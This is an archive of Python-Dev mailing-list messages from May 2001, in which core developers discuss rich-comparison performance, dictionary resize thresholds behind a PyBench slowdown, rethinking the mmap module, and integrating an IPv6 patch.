References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Thu May 17 17:04:50 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
	<200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett at stsci.edu  Thu May 17 16:56:49 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one at home.com  Thu May 17 18:02:38 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forcefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
   non-dict string case anyway (where it succeeded only 1 in 20
   times).
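A minimal Python sketch of point 1. It assumes the emulated cmp() tries ==, then <, then >, which is the order implied by the 1/2/3 counts above. `CountingStr`, `cmp_via_richcmp` and `calls_for` are hypothetical names used only for illustration, and the counter stands in for calls into the string comparison routine.

```python
class CountingStr:
    """Wraps a str and counts every rich comparison performed on it."""
    calls = 0

    def __init__(self, s):
        self.s = s

    def __eq__(self, other):
        CountingStr.calls += 1
        return self.s == other.s

    def __lt__(self, other):
        CountingStr.calls += 1
        return self.s < other.s

    def __gt__(self, other):
        CountingStr.calls += 1
        return self.s > other.s


def cmp_via_richcmp(a, b):
    """Emulate a 3-way cmp() using only ==, < and >, tried in that order."""
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    raise TypeError("objects are unordered")


def calls_for(x, y):
    """Return (cmp result, number of rich comparisons used) for two strings."""
    CountingStr.calls = 0
    result = cmp_via_richcmp(CountingStr(x), CountingStr(y))
    return result, CountingStr.calls
```

Comparing "eggs" with "spam" costs two calls, and "spam" with "eggs" costs three, where a single old-style string compare would have cost one in every case.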

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  It's also the case that a "fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido at digicool.com  Thu May 17 20:18:27 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's our IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 21:45:29 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate 3way
compare using rich compare?

I just changed the order in do_cmp, to the IMO more correct 

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.
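The fallback order in the C fragment above can be modeled in Python as follows. This is a sketch, not CPython's code. The callables are hypothetical stand-ins for `tp_compare`, `try_rich_to_3way_compare`, `try_3way_compare` and `default_3way_compare`. The model also assumes their C return convention: -1/0/1 for a result, -2 for an error, and 2 for "not implemented", so `c < 2` means "stop here".

```python
NOT_IMPLEMENTED = 2  # a result of 2 means "this strategy could not decide"


def do_cmp(v, w, tp_compare, try_rich, try_3way, default_3way):
    """Model the revised do_cmp() fallback order.

    tp_compare is the shared type's compare slot (or None); the other three
    arguments are callables returning -1, 0, 1, -2 (error) or NOT_IMPLEMENTED.
    """
    # Same type with a tp_compare slot: call it directly and stop.
    if type(v) is type(w) and tp_compare is not None:
        return tp_compare(v, w)
    # Otherwise try rich comparisons first, then a genuine 3-way compare.
    for strategy in (try_rich, try_3way):
        c = strategy(v, w)
        if c < NOT_IMPLEMENTED:  # -2, -1, 0 or 1: an error or a real answer
            return c
    # Last resort: the default ordering.
    return default_3way(v, w)
```

The design point is that a same-type `tp_compare` short-circuits everything, so cmp() on two strings never pays for the rich-comparison emulation.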

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?

Regards,
Martin


From tim at digicool.com  Fri May 18 00:55:19 2001
From: tim at digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3rd full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.
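The two resize policies can be replayed with a small Python model. It is a sketch under stated assumptions. It tracks only `fill` and `size`, and because there are no deletions, fill equals the number of keys. It also assumes a growth rule in which a resize picks the smallest power of two, at least the minimum size, that exceeds twice the current key count; an empty dict simply gets the minimum size. `new_size` and `simulate` are hypothetical names.

```python
def new_size(min_used, min_size):
    """Smallest power of two >= min_size that is strictly greater than min_used."""
    size = min_size
    while size <= min_used:
        size <<= 1
    return size


def simulate(n_keys, policy, min_size=4):
    """Insert n_keys distinct keys into an empty dict model.

    policy "pre-2.1": check the 2/3 load limit *before* each insert.
    policy "2.1":     check it *after* an insert that added a new key.
    Returns (number of resizes, final table size).
    """
    size = fill = resizes = 0
    for _ in range(n_keys):
        if policy == "pre-2.1":
            if fill * 3 >= size * 2:
                size = new_size(fill * 2, min_size)
                resizes += 1
            fill += 1
        elif policy == "2.1":
            if fill >= size:  # no free slot at all: only when the dict is empty
                size = new_size(0, min_size)
                resizes += 1
            fill += 1
            if fill * 3 >= size * 2:
                size = new_size(fill * 2, min_size)
                resizes += 1
        else:
            raise ValueError("unknown policy: %r" % policy)
    return resizes, size
```

Under these assumptions, three keys cost one resize and end in 4 slots before 2.1, but two resizes and 8 slots under 2.1. With a minimum size of 8, the 2.1 policy is back to a single resize.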

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip at pobox.com  Fri May 18 01:21:50 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy at digicool.com  Thu May 17 20:39:07 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one at home.com  Fri May 18 02:08:13 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".
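The point about C integer widths can be checked from Python with the standard `ctypes` module. This is a minimal sketch. `fits_in_c_long` and `fits_in_size_t` are hypothetical helpers that ask whether a byte offset is representable in the platform's C `long` or `size_t`.

```python
import ctypes


def fits_in_c_long(offset):
    """True if offset can be stored in this platform's signed C long."""
    bits = ctypes.sizeof(ctypes.c_long) * 8
    return -(1 << (bits - 1)) <= offset < (1 << (bits - 1))


def fits_in_size_t(offset):
    """True if offset can be stored in this platform's (unsigned) size_t."""
    bits = ctypes.sizeof(ctypes.c_size_t) * 8
    return 0 <= offset < (1 << bits)
```

On an LP64 system such as 64-bit Linux, `fits_in_c_long(5 * 2**30)` is true. On 64-bit Windows, where `long` stays 4 bytes, it is false, even though a 64-bit `size_t` would hold the value.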

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.
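Here is one possible shape for such a wart. The sketch uses the `offset` argument and the `mmap.ALLOCATIONGRANULARITY` constant that later versions of Python's `mmap` module provide; neither existed when this was written. It rounds the requested offset down to the OS granularity, maps from there, and slices off the extra leading bytes. `read_at` is a hypothetical helper, and it assumes `offset + length` does not run past the end of the file.

```python
import mmap


def read_at(path, offset, length):
    """Read `length` bytes starting at an arbitrary `offset` via mmap.

    The OS only accepts mapping offsets that are multiples of
    mmap.ALLOCATIONGRANULARITY (the page size on Unix, usually 64 KiB on
    Windows), so map from the aligned base and skip the first `delta` bytes.
    """
    if length <= 0:
        return b""  # a zero-length mapping would mean "the whole file"
    granularity = mmap.ALLOCATIONGRANULARITY
    base = offset - (offset % granularity)
    delta = offset - base
    with open(path, "rb") as f:
        with mmap.mmap(f.fileno(), delta + length,
                       access=mmap.ACCESS_READ, offset=base) as m:
            return m[delta:delta + length]
```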

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one at home.com  Fri May 18 02:29:18 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's our IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy at digicool.com  Fri May 18 00:16:15 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim at digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one at home.com  Fri May 18 05:26:52 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -- therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Fri May 18 06:45:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's our IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are three problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch has been sitting there since 2000-08-16, making it the oldest
open patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'd also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fix them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim at digicool.com  Fri May 18 09:17:07 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.
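The percentages quoted above follow from the %total column of the table and the two resize tests. Here is a small Python check. `PCT_BY_FILL` copies the table's %total figures for fills 0 through 6, and the helper names are hypothetical. Under the current rule, a table of `size` slots holds any fill with `fill*3 < size*2`; under the proposed rule, it holds any fill with `fill*4 <= size*3`.

```python
# %total of dicts by final ma_fill, copied from the test-suite table (fills 0..6).
PCT_BY_FILL = {0: 13.91, 1: 53.30, 2: 11.88, 3: 10.80,
               4: 1.98, 5: 3.60, 6: 0.88}


def max_fill_2_3(size):
    """Largest fill that avoids a resize under mp->ma_fill*3 >= mp->ma_size*2."""
    return (2 * size - 1) // 3


def max_fill_3_4(size):
    """Largest fill that avoids a resize under mp->ma_fill*4 > mp->ma_size*3."""
    return (3 * size) // 4


def share_fitting(max_fill):
    """Percent of all dicts whose final fill is <= max_fill (valid up to 6)."""
    return round(sum(p for fill, p in PCT_BY_FILL.items() if fill <= max_fill), 2)
```

This gives 79.09% for 4 slots under the 2/3 rule and 95.47% for 8 slots, which is consistent with the "93+%" above. It gives 89.89% ("about 90%") for 4 slots under the 3/4 rule.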

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal at lemburg.com  Fri May 18 09:26:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
> >>>>> "TP" == Tim Peters <tim at digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than using malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the best performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim at digicool.com  Fri May 18 10:32:39 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the best performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal at lemburg.com  Fri May 18 13:36:28 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.



From mal at lemburg.com  Fri May 18 13:38:39 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
